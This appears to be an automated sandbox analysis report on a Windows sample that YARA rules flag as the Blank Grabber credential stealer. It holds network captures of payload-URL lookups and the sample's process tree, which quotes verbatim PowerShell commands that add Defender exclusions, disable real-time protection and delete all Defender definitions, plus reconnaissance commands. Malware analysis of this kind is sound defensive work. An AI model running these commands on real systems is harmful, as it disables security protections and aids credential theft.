2024-10-27 17:44:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49785 | 172.67.203.125 | 443 | 7976 | C:\Users\user\AppData\Local\Temp\bound.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 17:44:34 UTC | 56 | OUT | GET /api/endpoint.json HTTP/1.1
Host: getsolara.dev
2024-10-27 17:44:34 UTC | 1019 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 17:44:34 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=0, must-revalidate
ETag: W/"58e4ee2ed9918060304a9212edaf09e7"
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6QbEZ%2FxQVzeSD51L6TZPvbhWQHupkDfR%2FUO2FGbUoLKAGpllqYI415OLjzWEdBWZILMtS2w8av%2B2hFgTz0lyAoBydo5qd6LYOzCPCx84Xtt71DLcFn3PyoCVyY7ORe1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Strict-Transport-Security: max-age=0
Server: cloudflare
CF-RAY: 8d947ead8fe62e69-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1328&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2811&recv_bytes=694&delivery_rate=2187311&cwnd=251&unsent_bytes=0&cid=72cdfc802aee87ac&ts=186&x=0"
2024-10-27 17:44:34 UTC | 350 | IN | Data Raw: 32 31 63 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 32 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 34 66 66 64 65 62 33 65 33 39 33 65 34 36 39 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 32 34 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 39 39 61 62 35 64 39 63 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73
Data Ascii: 21c{ "BootstrapperVersion": "1.22", "SupportedClient": "version-4ffdeb3e393e469e", "SoftwareVersion": "3.124", "BootstrapperUrl": "https://99ab5d9c.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
2024-10-27 17:44:34 UTC | 197 | IN | Data Raw: 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 64 63 62 63 31 37 65 30 31 61 61 37 35 66 32 36 64 61 32 34 35 33 31 38 35 64 33 61 33 33 31 30 37 33 34 61 36 30 62 38 35 31 65 64 66 61 65 34 35 63 62 65 61 35 35 31 30 31 63 39 31 66 62 30 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 20 55 70 64 61 74 65 64 22 0a 7d 0d 0a
Data Ascii: tps://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"dcbc17e01aa75f26da2453185d3a3310734a60b851edfae45cbea55101c91fb0", "Changelog":"[+] Updated"}
2024-10-27 17:44:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49792 | 128.116.123.4 | 443 | 7976 | C:\Users\user\AppData\Local\Temp\bound.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 17:44:35 UTC | 119 | OUT | GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
Host: clientsettings.roblox.com
Connection: Keep-Alive
2024-10-27 17:44:35 UTC | 576 | IN | HTTP/1.1 200 OK
content-length: 119
content-type: application/json; charset=utf-8
date: Sun, 27 Oct 2024 17:44:35 GMT
server: Kestrel
cache-control: no-cache
strict-transport-security: max-age=3600
x-frame-options: SAMEORIGIN
roblox-machine-id: eb1c3008-1849-20c7-48c2-cc5773503727
x-roblox-region: us-central_rbx
x-roblox-edge: fra2
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
connection: close
2024-10-27 17:44:35 UTC | 119 | IN | Data Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 34 38 2e 31 2e 36 34 38 30 37 38 33 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 34 66 66 64 65 62 33 65 33 39 33 65 34 36 39 65 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 31 2c 20 36 34 38 30 37 38 33 22 7d
Data Ascii: {"version":"0.648.1.6480783","clientVersionUpload":"version-4ffdeb3e393e469e","bootstrapperVersion":"1, 6, 1, 6480783"}


Session ID:3
Source IP:192.168.2.9
Source Port:49809
Destination IP:104.20.23.46
Destination Port:443
PID:7976
Process:C:\Users\user\AppData\Local\Temp\bound.exe

Timestamp:2024-10-27 17:44:38 UTC
Bytes transferred:99
Direction:OUT
Data:GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
Host: www.nodejs.org
Connection: Keep-Alive

Timestamp:2024-10-27 17:44:38 UTC
Bytes transferred:497
Direction:IN
Data:HTTP/1.1 307 Temporary Redirect
Date: Sun, 27 Oct 2024 17:44:38 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
Cache-Control: public, max-age=0, must-revalidate
location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-vercel-id: cle1::xdccc-1730051078600-da22783cb291
CF-Cache-Status: DYNAMIC
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8d947ec7688d3aaa-DFW

Timestamp:2024-10-27 17:44:38 UTC
Bytes transferred:20
Direction:IN
Data Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
Data Ascii: fRedirecting...

Timestamp:2024-10-27 17:44:38 UTC
Bytes transferred:5
Direction:IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID:0
Start time:13:44:22
Start date:27/10/2024
Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"
Imagebase:0x7ff7ead00000
File size:8'240'610 bytes
MD5 hash:3C1B1F453E5F9F0D71F7862D2D6235FE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1393387910.000001C12B872000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1393387910.000001C12B874000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:2
Start time:13:44:23
Start date:27/10/2024
Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"
Imagebase:0x7ff7ead00000
File size:8'240'610 bytes
MD5 hash:3C1B1F453E5F9F0D71F7862D2D6235FE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1407872022.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:3
Start time:13:44:25
Start date:27/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'"
Imagebase:0x7ff7738f0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:13:44:25
Start date:27/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:0x7ff7738f0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:13:44:25
Start date:27/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:13:44:25
Start date:27/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:13:44:25
Start date:27/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                                                                                                                                                                                                                            Imagebase:0x7ff7738f0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "start bound.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff7738f0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:13:44:25
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff7738f0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:13:44:26
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
Imagebase:0x7ff760310000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:13:44:26
Start date:27/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:0x7ff7738f0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:13:44:26
Start date:27/10/2024
Path:C:\Users\user\AppData\Local\Temp\bound.exe
Wow64 process (32bit):false
Commandline:bound.exe
Imagebase:0x254b4b60000
File size:819'200 bytes
MD5 hash:2A4DCF20B82896BE94EB538260C5FB93
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:13:44:26
Start date:27/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:13:44:26
Start date:27/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:13:44:26
Start date:27/10/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff7cf080000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:13:44:27
Start date:27/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic csproduct get uuid
Imagebase:0x7ff620410000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:13:44:27
Start date:27/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd" /c ipconfig /all
Imagebase:0x7ff7738f0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:13:44:27
Start date:27/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:13:44:28
Start date:27/10/2024
Path:C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):false
Commandline:ipconfig /all
Imagebase:0x7ff77afe0000
File size:35'840 bytes
MD5 hash:62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:13:44:32
Start date:27/10/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff72d8c0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:13:44:38
Start date:27/10/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -u -p 7976 -s 2228
                                                                                                                                                                                                                            Imagebase:0x7ff6d96a0000
                                                                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                            Start time:13:44:39
                                                                                                                                                                                                                            Start date:27/10/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                            Imagebase:0x7ff6496b0000
                                                                                                                                                                                                                            File size:468'120 bytes
                                                                                                                                                                                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true


Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 19.9%
Total number of Nodes: 2000
Total number of Limit Nodes: 31
17167->17168 17171 7ff7ead28020 20 API calls 17168->17171 17172 7ff7ead1a900 _isindst 17 API calls 17169->17172 17170->17164 17182 7ff7ead242e6 __scrt_get_show_window_mode 17171->17182 17173 7ff7ead25339 17172->17173 17175 7ff7ead0c550 _log10_special 8 API calls 17174->17175 17176 7ff7ead1e351 17175->17176 17200 7ff7ead23af4 17176->17200 17177 7ff7ead2468f __scrt_get_show_window_mode 17178 7ff7ead24327 memcpy_s 17193 7ff7ead24783 memcpy_s __scrt_get_show_window_mode 17178->17193 17195 7ff7ead24c6b memcpy_s __scrt_get_show_window_mode 17178->17195 17179 7ff7ead249cf 17180 7ff7ead23c10 37 API calls 17179->17180 17184 7ff7ead250e7 17180->17184 17181 7ff7ead2497b 17181->17179 17181->17181 17183 7ff7ead2533c memcpy_s 37 API calls 17181->17183 17182->17177 17182->17178 17185 7ff7ead14f08 _set_fmode 11 API calls 17182->17185 17183->17179 17184->17184 17189 7ff7ead2533c memcpy_s 37 API calls 17184->17189 17199 7ff7ead25142 17184->17199 17186 7ff7ead24760 17185->17186 17188 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17186->17188 17187 7ff7ead252c8 17191 7ff7ead27e2c 37 API calls 17187->17191 17188->17178 17189->17199 17190 7ff7ead14f08 11 API calls _set_fmode 17190->17193 17191->17174 17192 7ff7ead14f08 11 API calls _set_fmode 17192->17195 17193->17181 17193->17190 17196 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 17193->17196 17194 7ff7ead23c10 37 API calls 17194->17199 17195->17179 17195->17181 17195->17192 17198 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 17195->17198 17196->17193 17197 7ff7ead2533c memcpy_s 37 API calls 17197->17199 17198->17195 17199->17187 17199->17194 17199->17197 17201 7ff7ead23b13 17200->17201 17202 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17201->17202 17203 7ff7ead23b3e memcpy_s 17201->17203 17202->17203 17203->17126 17205 7ff7ead1e1d8 memcpy_s 17204->17205 17206 7ff7ead147c0 45 API calls 17205->17206 17207 7ff7ead1e292 memcpy_s __scrt_get_show_window_mode 17205->17207 17206->17207 17207->17127 17209 
7ff7ead1df2b 17208->17209 17212 7ff7ead1df78 memcpy_s 17208->17212 17210 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17209->17210 17211 7ff7ead1df57 17210->17211 17211->17127 17213 7ff7ead1dfe3 17212->17213 17215 7ff7ead147c0 45 API calls 17212->17215 17214 7ff7ead1a4a4 __std_exception_copy 37 API calls 17213->17214 17218 7ff7ead1e025 memcpy_s 17214->17218 17215->17213 17216 7ff7ead1a900 _isindst 17 API calls 17217 7ff7ead1e0d0 17216->17217 17218->17216 17220 7ff7ead10c5f 17219->17220 17226 7ff7ead10c4e 17219->17226 17221 7ff7ead1d5fc _fread_nolock 12 API calls 17220->17221 17220->17226 17222 7ff7ead10c90 17221->17222 17223 7ff7ead10ca4 17222->17223 17224 7ff7ead1a948 __free_lconv_num 11 API calls 17222->17224 17225 7ff7ead1a948 __free_lconv_num 11 API calls 17223->17225 17224->17223 17225->17226 17226->17039 17228 7ff7ead1476e 17227->17228 17229 7ff7ead14766 17227->17229 17228->17050 17230 7ff7ead147c0 45 API calls 17229->17230 17230->17228 17232 7ff7ead1d9d1 17231->17232 17234 7ff7ead147ff 17231->17234 17233 7ff7ead23304 45 API calls 17232->17233 17232->17234 17233->17234 17235 7ff7ead1da24 17234->17235 17236 7ff7ead1da3d 17235->17236 17238 7ff7ead1480f 17235->17238 17237 7ff7ead22650 45 API calls 17236->17237 17236->17238 17237->17238 17238->16972 17245 7ff7ead26d88 17239->17245 17244 7ff7ead1f8a9 MultiByteToWideChar 17242->17244 17247 7ff7ead26dec 17245->17247 17246 7ff7ead0c550 _log10_special 8 API calls 17248 7ff7ead200bd 17246->17248 17247->17246 17248->17074 17250 7ff7ead10ffd 17249->17250 17251 7ff7ead1100f 17249->17251 17252 7ff7ead14f08 _set_fmode 11 API calls 17250->17252 17254 7ff7ead1101d 17251->17254 17257 7ff7ead11059 17251->17257 17253 7ff7ead11002 17252->17253 17255 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17253->17255 17256 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17254->17256 17265 7ff7ead1100d 17255->17265 17256->17265 17258 7ff7ead113d5 17257->17258 17260 7ff7ead14f08 _set_fmode 11 API calls 17257->17260 17259 
